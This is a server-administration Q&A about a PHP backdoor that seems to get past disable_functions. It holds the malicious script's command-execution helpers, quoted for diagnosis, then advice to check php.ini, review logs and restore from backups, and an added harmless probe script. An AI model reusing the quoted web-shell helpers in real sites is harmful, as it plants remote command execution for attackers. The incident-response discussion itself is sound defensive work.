
I had a problem on my server today and discovered malicious code which an attacker used to gain access to my system. I downloaded that PHP script, but what was weird is that I saw functions which are disabled in my PHP configuration.

Disabled are: passthru, exec, shell_exec, system, among others.

How is that possible?

This is part of the code:

<?php
// Returns the name of the last command-execution function that
// function_exists() reports, or "Disabled" if none. Before PHP 8.0,
// function_exists() still returns true for a function listed in
// disable_functions, so this check alone does not prove the function works.
function get_execution_method()
{
    if (function_exists('passthru'))   { $m = "passthru"; }
    if (function_exists('exec'))       { $m = "exec"; }
    if (function_exists('shell_exec')) { $m = "shell_exec"; }
    if (function_exists('system'))     { $m = "system"; }
    if (!isset($m)) // No method found :-|
    {
        $m = "Disabled";
    }
    return $m;
}

// Runs $command with the chosen function and prints whatever it returns.
function execute_command($method, $command)
{
    if ($method == "passthru")
    {
        passthru($command);
    }
    elseif ($method == "exec")
    {
        exec($command, $result);
        foreach ($result as $output)
        {
            print $output . "<br>";
        }
    }
    elseif ($method == "shell_exec")
    {
        print shell_exec($command);
    }
    elseif ($method == "system")
    {
        system($command);
    }
}

// Octal permission string (e.g. "0644") of a file, or "????" if it is missing.
function perm($file)
{
    if (file_exists($file))
    {
        return substr(sprintf('%o', fileperms($file)), -4);
    }
    else
    {
        return "????";
    }
}

Just to be sure that there are no leftovers, I copied that script to a new account which no one has access to except me. There is no .htaccess file or php.ini. The script still works on that account. I created a phpinfo file to see the PHP configuration for that file, and here are the disabled functions:

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen

As you can see, the functions used in that script are among the disabled functions.

When I try to run one of the disabled functions I get this message:

Warning: system() has been disabled for security reasons in /home/user....

Just to make sure, I uploaded that script to a different server, and the same was possible. That server also has the same disabled functions.

How can I prevent this from allowing someone access to my files?

emir
    If your system has already been attacked this way, then you should simply restore from backups. Your PHP might have been replaced with a version that simply doesn't obey any of these settings, or many other things could have been changed. – Tero Kilkanen Mar 19 '17 at 07:23
  • System files are not, because I am using CageFS, which prevents any user from accessing anything but their own account or settings. – emir Mar 19 '17 at 19:09
  • You cannot be sure of that. Even though tools place different kinds of restrictions to user access on things, they might be buggy themselves and could be exploited. – Tero Kilkanen Mar 20 '17 at 01:39
  • I have just uploaded the script to a different server with the same disabled functions, and the script bypasses them. This server is not related to the one where the script was found. – emir Mar 20 '17 at 07:29
  • Obligatory Reference: https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server. – Phill W. Jan 25 '22 at 12:43

1 Answer


Probably you are looking at the wrong php.ini. Confirm that the functions are disabled by creating a test.php containing the following in the same folder the malicious code was in and navigating to it. Look at disable_functions and confirm they are.

<?php

phpinfo();

?>

Most Apache installations on Linux support many ways of executing PHP code; check disable_functions in all your system-wide php.ini files with this:

grep -rn disable_functions /etc/php*/

Also check out any php.ini and .htaccess in your /var/www.

Check the vhost logs, Apache logs, and system logs.

Depending on the level of your system's compromise you may even be unable to see the actual configuration files in production for your services.

Edit: After reading your further comments I must suppose that your system is deeply compromised and you should (or, in your place, I would) quit wasting time and reinstall the system / restore from backups. Please take seriously into account that many files on your sites are probably compromised too. Restore from backups; don't take files from the compromised system to the new production environment.

Marco
  • I have copied that PHP file to a new account which no one has access to, and it is still the same. There is no .htaccess or php.ini file. Disabled functions as a result of phpinfo are pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen – emir Mar 19 '17 at 19:00
  • @emir how about the logs? Enable debug/verbose mode for both apache and php and take a look at what happens when the backdoor is invoked. Paste relevant lines please. – Marco Mar 19 '17 at 19:23
  • Do you mean to set apache LogLevel on debug? – emir Mar 19 '17 at 19:51
  • @emir not only, try this too: http://stackoverflow.com/a/3531852/3320401 – Marco Mar 19 '17 at 19:58
  • I have created a php.ini file with content from https://perishablepress.com/advanced-php-error-handling-via-php/ which is referenced at the link you provided. I am using this script and there is no log – emir Mar 19 '17 at 20:08
  • @emir I edited my answer, not good news for you mate, I'm sorry. – Marco Mar 19 '17 at 20:12
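The question's script only checks function_exists(), and the answer relies on phpinfo(). Neither tells you whether a listed function can actually run, and before PHP 8.0 function_exists() returns true for a function in disable_functions (the function stays in the function table with a stub handler that emits the "has been disabled for security reasons" warning seen above; from PHP 8.0 the entry is removed and function_exists() returns false). The probe below is an added example, not code from the question or the answer: dropped next to the suspicious script and requested through the web server, it runs in the same SAPI and reports which php.ini was loaded, what function_exists() says for each suspect, and what really happens when one of them is called. The command "id" and the $suspects list are assumptions of this example, chosen to be harmless and to match the disable_functions value quoted on the page.

```php
<?php
// Added example (not part of the original question or answer): probe whether
// the functions in disable_functions are merely stubbed or really unusable,
// from inside the SAPI that serves the suspicious script. Request it once
// through the web server, read the plain-text output, then delete it.
//
// Assumptions not taken from the page: "id" is used only because its output is
// harmless and easy to recognise; adjust $suspects if your list differs.

header('Content-Type: text/plain');

// disable_functions as the running interpreter sees it, as a clean array.
function disabled_functions()
{
    $raw = (string) ini_get('disable_functions');
    return array_values(array_filter(array_map('trim', explode(',', $raw))));
}

// Call $fn($cmd) the way the malware does (by variable name), turning the
// warning PHP emits for a stubbed function, or the Error thrown for a removed
// one, into a result string instead of a half-rendered page.
function probe($fn, $cmd)
{
    $warning = null;
    set_error_handler(function ($errno, $errstr) use (&$warning) {
        $warning = $errstr;
        return true;                // swallow the warning, we report it ourselves
    });
    try {
        $out = $fn($cmd);           // shell_exec returns all output, exec the last line
    } catch (Error $e) {            // PHP >= 8: "Call to undefined function ..."
        restore_error_handler();
        return 'blocked: ' . $e->getMessage();
    }
    restore_error_handler();
    if ($warning !== null) {        // PHP < 8: "... has been disabled for security reasons"
        return 'blocked: ' . $warning;
    }
    return 'EXECUTED, output: ' . trim((string) $out);
}

$disabled = disabled_functions();
$suspects = array('exec', 'system', 'passthru', 'shell_exec', 'proc_open', 'popen');

printf("PHP %s via %s\n", PHP_VERSION, PHP_SAPI);
printf("Loaded php.ini:    %s\n", php_ini_loaded_file() ?: '(none)');
printf("Scanned ini files: %s\n", php_ini_scanned_files() ?: '(none)');
printf("disable_functions: %s\n\n", $disabled ? implode(',', $disabled) : '(empty)');

// Before PHP 8.0 a disabled function keeps its entry in the function table,
// so function_exists() still says "yes" and the malware's get_execution_method()
// picks it; the call itself then only prints the warning.
foreach ($suspects as $fn) {
    printf("%-10s listed=%-3s function_exists=%-3s\n",
        $fn,
        in_array($fn, $disabled, true) ? 'yes' : 'no',
        function_exists($fn) ? 'yes' : 'no');
}

// The only test that matters: try to run something harmless.
echo "\nshell_exec('id') => ", probe('shell_exec', 'id'), "\n";
echo "exec('id')       => ", probe('exec', 'id'), "\n";
```

If both probe lines come back "blocked", disable_functions is doing its job and the script on the page would have printed nothing but warnings; the "listed=yes function_exists=yes" rows are the expected pre-PHP-8 behaviour, not a bypass. If a probe line shows the output of `id` while the same request lists the function in disable_functions, the interpreter itself can no longer be trusted, which is the situation the answer's edit and the comments describe. disable_functions is a system-level directive, so a .user.ini or .htaccess php_value line cannot change it; what can is a different php.ini being loaded for that SAPI, which is why the "Loaded php.ini" line is printed first.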